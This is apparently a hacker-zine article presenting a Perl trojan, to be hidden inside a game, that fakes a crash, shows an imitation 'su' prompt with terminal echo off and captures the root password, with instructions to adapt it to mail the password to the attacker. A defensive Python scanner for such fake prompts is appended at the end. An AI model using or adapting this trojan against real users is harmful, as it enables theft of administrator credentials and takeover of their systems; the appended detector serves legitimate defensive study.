A Password Grabbing Attempt

First and foremost, I would like to get something out of the way.
My Rogers @Home article in 18:4 was not to tell people how to
uncap their modems (as so many people e-mailed me about). It was about
what I believe hacking to be: Learning. It was something to get you
started on your road of learning and teaching others about computers,
networks, and security. I hope it helped some people out. Now, onto the

We have all heard about, or even created our own, programs that will
rootkit a system. Heck, we're even satisfied if we can get access to a
webserver and deface someone's site. The only problem with attacking the
computer is that computers are strict. A rule is either true or false and
if your program doesn't meet the criteria, then you don't get access.
"What else is there besides attacking the computer?" you ask. Answer:
The operator of the computer. Social engineering doesn't have to be over
the phone or while you're dressed up like a Bell employee. Let's examine
this a bit:

Honestly (for real) how many people out there running UNIX boxes log
in as "root" all the time? Do you really log in as "user" and "su" when
you need to? Sure, it's good security practice, but human nature is about
being lazy and if it saves typing two letters and a password, then hey, all
the better. This is what we're playing upon: The ineptitude, laziness, and
lack of security focus of our target operator. The basis of the program
is to hide another program that will e-mail you the operator's "root"
password. You will have to know a little programming (or at least understand
the syntaxes of basic programming) and a fair amount of UNIX technical speak.

Please keep in mind that this is the first program I have ever
created so you may find an easier way to tweak it. Feel free.

First, modify this program to your liking. Second, create (or get the
source code to) another program, like a game (the type of program doesn't
matter, but something that your target wouldn't normally look at the
source code of). Third, have them run the program.

It seems to me (and all my UNIX friends) that we're getting a bit lax
on local security. I run as "root" all the time on my laptop (and my friends
log in as "root" on their boxes quite often), which is kind of hypocritical
of me. I wrote this article in the hope that people will realize that we, the
hacking community, set the standards for UNIX security; we have to stay on
top of things and not get lazy. Local security is the most protected form
of security and if you've lost it, you've lost all your security.

Shout-outs: Cat5, Deathstroke, Harkonen, CrtklMass, c00k, Storm_Dragon,
and, of course, eXoDuS (YNBABWARL!)

# by Gr@ve_Rose
# We all know about fancy programs that take over your system
# but what about programs that rely on the ineptitude of
# the operator? Here is the basic idea:
# 1. Start making a program, something small like a game.
# 2. Make it crash. Well, not really, just look like it crashed.
# 3. Pretend that it was a serious crash, serious enough that
# your 'game' might do bad system things.
# 4. Get them to 'su'.
# 5. One free root password.
# Obviously if your 'game' would do something bad, your up-to-date
# wouldn't let it. But, if the person operating it doesn't know that... :)
# Get the hostname to make it look like a real "system drop" instead
# of just typing [guest@localhost /]$
chop(my $host = `/bin/hostname`);
# FALSE PROGRAM GOES HERE
# Turn the echo off so it seems like they're using 'su'
system ("stty -echo");
# Make it look like the program died while making a system call
# (Feel free to make a 'real' excuse)
print "Error: unhandled system exception at line 10.\n";
# Like this will ever happen, but, hey, it's all about how much your
# victim doesn't know! ;)
print "Dropping you to a guest account for safety. Please 'su' back to root\n";
# Make some apologetic reason that your 'program' died
print "Yeah, this program needs to be fixed. Sorry for the inconvenience.\n";
# One 'real' system prompt calling 'su' coming up....
print "$host /]\$ su ";
# Come to daddy
my $command = <STDIN>;
# Change the following lines to mail the password to you
# You'll need to add a few things like full hostname and, hopefully,
# an IP address
print "Your root password is: $command\n";
print "Thankfully this is just a proof-of-concept program.\n";
print "You may want to be more cautious in the future.\n";
# Turn echo back on so we can see what we are typing
system ("stty echo");
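
A defender-side counterpart to the script above, as an added example that is not part of the original article: a heuristic Python scanner that flags source which turns terminal echo off and then reads the terminal, and escalates when the code also prints something shaped like a shell prompt followed by su. The patterns, verdict names and both sample scripts are constructed for this illustration.

```python
import re

# Heuristic patterns: assumptions of this example, not an exhaustive rule set.
ECHO_OFF = re.compile(r"stty\s+-echo")
ECHO_ON = re.compile(r"stty\s+echo")
STDIN_READ = re.compile(r"<STDIN>|\bread\s")       # Perl and shell reads
FAKE_PROMPT = re.compile(r"[$#>]\s*su\b")           # e.g. a printed "$ su"

def scan(source):
    """Return (line_number, verdict) for each terminal read done with echo off."""
    findings, echo_off, fake_prompt = [], False, False
    for number, line in enumerate(source.splitlines(), 1):
        code = line.strip()
        if not code or code.startswith("#"):
            continue  # skip comments: they may mention 'su' without doing anything
        if FAKE_PROMPT.search(code):
            fake_prompt = True
        if ECHO_OFF.search(code):
            echo_off = True
        elif ECHO_ON.search(code):
            echo_off = False
        elif echo_off and STDIN_READ.search(code):
            # A hidden read is normal for a passphrase prompt; a hidden read
            # behind an imitation shell prompt is not.
            verdict = "fake-su-prompt" if fake_prompt else "hidden-input"
            findings.append((number, verdict))
    return findings

# Constructed sample: condensed from the pattern in the listing above.
SUSPECT = r'''
system("stty -echo");
print "Dropping you to a guest account. Please 'su' back to root\n";
print "$host /]\$ su ";
my $command = <STDIN>;
system("stty echo");
'''

# Constructed sample: an ordinary passphrase prompt, worth a look but not a lure.
BENIGN = r'''
system("stty -echo");
print "Passphrase for backup archive: ";
my $pass = <STDIN>;
system("stty echo");
'''

if __name__ == "__main__":
    for name, sample in (("SUSPECT", SUSPECT), ("BENIGN", BENIGN)):
        print(name, scan(sample))
```

A "hidden-input" result is only a prompt to read the code; a "fake-su-prompt" result means the program is drawing its own shell prompt, which a real drop to a shell never requires.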